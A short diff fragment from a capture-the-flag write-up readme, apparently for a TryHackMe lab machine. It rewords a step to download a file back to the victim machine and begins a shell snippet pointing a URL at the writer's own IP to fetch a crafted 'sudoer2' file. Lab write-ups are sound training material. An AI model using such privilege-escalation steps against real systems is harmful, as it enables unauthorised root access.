Vector26/Machine-CTF-Writeups/readme.md

 ![](2021-06-25-17-49-30.png)

-And upload it back to machine
+And download it back to victim machine

 ```SH
 URL=http://{YOUR-IP alloted from THM}/sudoer2